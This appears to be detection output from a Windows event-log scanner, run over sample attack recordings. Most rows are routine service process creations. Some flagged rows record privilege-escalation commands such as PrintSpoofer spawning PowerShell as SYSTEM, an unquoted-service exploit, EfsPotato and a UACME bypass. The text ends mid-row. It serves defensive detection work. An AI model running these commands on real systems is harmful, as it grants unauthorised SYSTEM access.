C:\Windows\System32\svchost.exe : User: NT AUTHORITY\NETWORK SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:26.536 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: 
C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:26.540 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s SysMain : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:26.542 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:26.558 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:26.632 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:26.635 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: 
C:\Windows\system32\dxgiadaptercache.exe : Path: C:\Windows\System32\dxgiadaptercache.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:26.642 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s FontCache : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:26.643 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:26.645 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:26.652 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: 
C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:27.196 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:27.198 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:27.473 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:27.484 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:27.583 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: 
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:27.764 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\NETWORK SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:27.836 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k NetSvcs -p -s iphlpsvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:27.838 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\NETWORK SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:27.855 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: 
C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:27.970 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\NETWORK SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:28.014 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k utcsvc -p : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:28.063 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k LocalServiceNoNetwork -p -s DPS : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:28.065 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:28.068 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k 
LocalService -p -s SstpSvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:28.079 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\wlms\wlms.exe : Path: C:\Windows\System32\wlms\wlms.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:28.080 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,Rule: PrivEsc - Potential Unquoted Service Exploit : Command: c:\Program Files\vulnsvc\mmm.exe : Path: C:\program.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:28.086 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:28.096 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:28.465 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k LocalService -p -s WdiServiceHost : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:32.050 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: sihost.exe : Path: C:\Windows\System32\sihost.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:32.058 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc : Path: C:\Windows\System32\svchost.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:32.097 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s WpnUserService : Path: C:\Windows\System32\svchost.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:32.358 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: 
C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:35.125 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\userinit.exe : Path: C:\Windows\System32\userinit.exe : User: MSEDGEWIN10\IEUser : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:35.236 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\Explorer.EXE : Path: C:\Windows\explorer.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\userinit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:37.209 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32.exe AppXDeploymentExtensions.OneCore.dll,ShellRefresh : Path: C:\Windows\System32\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k wsappx -p -s AppXSvc",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:40.692 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:40.712 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.2002.1101.0_x64__8wekyb3d8bbwe\LocalBridge.exe"" 
/InvokerPRAID: Microsoft.MicrosoftOfficeHub notifications : Path: C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.2002.1101.0_x64__8wekyb3d8bbwe\LocalBridge.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\System32\RuntimeBroker.exe -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:20:11.341 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\eventvwr.exe"" : Path: C:\Windows\System32\eventvwr.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:20:11.402 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 6964 318 0000021FF2606500 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:20:11.516 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\eventvwr.exe"" : Path: C:\Windows\System32\eventvwr.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:20:16.073 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Discovery - domain time : Command: ""C:\BGinfo\BGINFO.EXE"" /accepteula /ic:\bginfo\bgconfig.bgi /timer:0 : Path: C:\BGinfo\BGINFO.EXE : User: MSEDGEWIN10\IEUser : Parent Command: 
C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:20:16.165 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\SecurityHealthService.exe : Path: C:\Windows\System32\SecurityHealthService.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:20:16.965 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Users\IEUser\AppData\Local\Microsoft\OneDrive\19.232.1124.0012\FileCoAuth.exe -Embedding : Path: C:\Users\IEUser\AppData\Local\Microsoft\OneDrive\19.232.1124.0012\FileCoAuth.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:20:18.975 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Users\IEUser\AppData\Local\Microsoft\OneDrive\OneDrive.exe"" /background : Path: C:\Users\IEUser\AppData\Local\Microsoft\OneDrive\OneDrive.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:20:21.251 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\regedit.exe"" : Path: C:\Windows\regedit.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:20:21.263 
+09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 6964 258 0000021FF266EC20 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:20:26.261 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\regedit.exe"" : Path: C:\Windows\regedit.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:21:08.564 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:21:18.412 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k NetworkService -p : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\NETWORK SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:21:19.340 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k NetworkService -p -s WinRM : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\NETWORK SERVICE : Parent Command: 
C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:21:19.629 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-05-03 03:01:54.855 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: PrintSpoofer.exe -i -c powershell.exe : Path: C:\Users\IEUser\Tools\PrivEsc\PrintSpoofer.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx -2020-05-03 03:01:54.863 +09:00,MSEDGEWIN10,17,critical,EfsPotato Named Pipe,,rules/sigma/pipe_created/sysmon_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx -2020-05-03 03:01:54.864 +09:00,MSEDGEWIN10,18,critical,EfsPotato Named Pipe,,rules/sigma/pipe_created/sysmon_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx -2020-05-03 03:01:54.867 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: powershell.exe : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: NT AUTHORITY\SYSTEM : Parent Command: PrintSpoofer.exe -i -c powershell.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx -2020-05-03 
03:01:54.867 +09:00,MSEDGEWIN10,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx -2020-05-03 03:01:57.418 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\whoami.exe"" : Path: C:\Windows\System32\whoami.exe : User: NT AUTHORITY\SYSTEM : Parent Command: powershell.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx -2020-05-03 03:01:57.418 +09:00,MSEDGEWIN10,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx -2020-05-03 03:01:57.418 +09:00,MSEDGEWIN10,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx -2020-05-03 03:01:57.418 +09:00,MSEDGEWIN10,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx -2020-05-07 22:13:02.481 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""c:\Windows\System32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\ChangePk.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_61_Changepk.evtx -2020-05-10 09:09:36.635 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: NetworkServiceExploit.exe -i -c ""c:\Windows\System32\cmd.exe"" : Path: C:\Users\IEUser\Tools\PrivEsc\NetworkServiceExploit.exe : User: NT 
